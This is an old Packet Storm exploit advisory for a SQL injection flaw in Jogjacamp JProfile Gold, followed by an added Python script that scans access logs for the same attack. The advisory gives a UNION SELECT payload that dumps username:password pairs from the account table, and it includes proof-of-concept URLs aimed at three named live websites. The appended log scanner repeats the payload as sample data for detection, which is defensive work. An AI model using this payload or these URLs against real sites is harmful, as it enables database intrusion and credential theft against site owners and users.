Jogjacamp JProfile Gold SQL Injection

2009-03-05T00:00:00
ID PACKETSTORM:75414
Type packetstorm
Reporter kecemplungkalen
Modified 2009-03-05T00:00:00

Description

                                        
                                            `###############################################################  
  
  
  
Jogjacamp JProfile Gold SQL Injection  
  
by kecemplungkalen   
  
Vendor : http://jogjacamp.com  
  
bugs : /index.php?action=news.detail&id_news=  
  
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--  
  
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--  
  
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--  
  
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--  
  
###############################################################  
  
greetz : Allah  
s3t4n and Paman aka Jack-  
my family  
and all Mainhack BrotherHood   
jupe crew, don't just play games all the time :p  
  
`
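
A defender's check for this bug, as an added example that is not part of the original advisory: it scans web-server access logs for requests to `action=news.detail` whose decoded `id_news` is anything other than a plain integer. The log lines are constructed, the client addresses are placeholders, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (client addresses are documentation-range
# placeholders); the second request carries the query string from the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Mar/2009:10:00:01 +0700] "GET /index.php?action=news.detail&id_news=6 HTTP/1.1" 200 5120
198.51.100.9 - - [05/Mar/2009:10:00:05 +0700] "GET /index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- HTTP/1.1" 200 5342
198.51.100.12 - - [05/Mar/2009:10:00:09 +0700] "GET /index.php?action=news.detail&id_news=abc HTTP/1.1" 200 4800
198.51.100.3 - - [05/Mar/2009:10:01:00 +0700] "GET /index.php?action=gallery&page=2 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d{1,10}")


def suspicious_id_news(target):
    """Return the decoded id_news value if it is not a plain integer, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("action") != ["news.detail"]:
        return None  # only the route named in the advisory is checked
    for value in query.get("id_news", []):
        # Allow-list: anything other than digits is reported, so no SQL
        # keyword signatures are needed.
        if not INTEGER_RE.fullmatch(value):
            return value
    return None


def scan(log_text):
    """Return (client, decoded id_news) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        bad_value = suspicious_id_news(target)
        if bad_value is not None:
            hits.append((client, bad_value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}\tid_news={value!r}")
```

The same allow-list rule (accept digits only, then bind the value as a query parameter) is the fix on the application side.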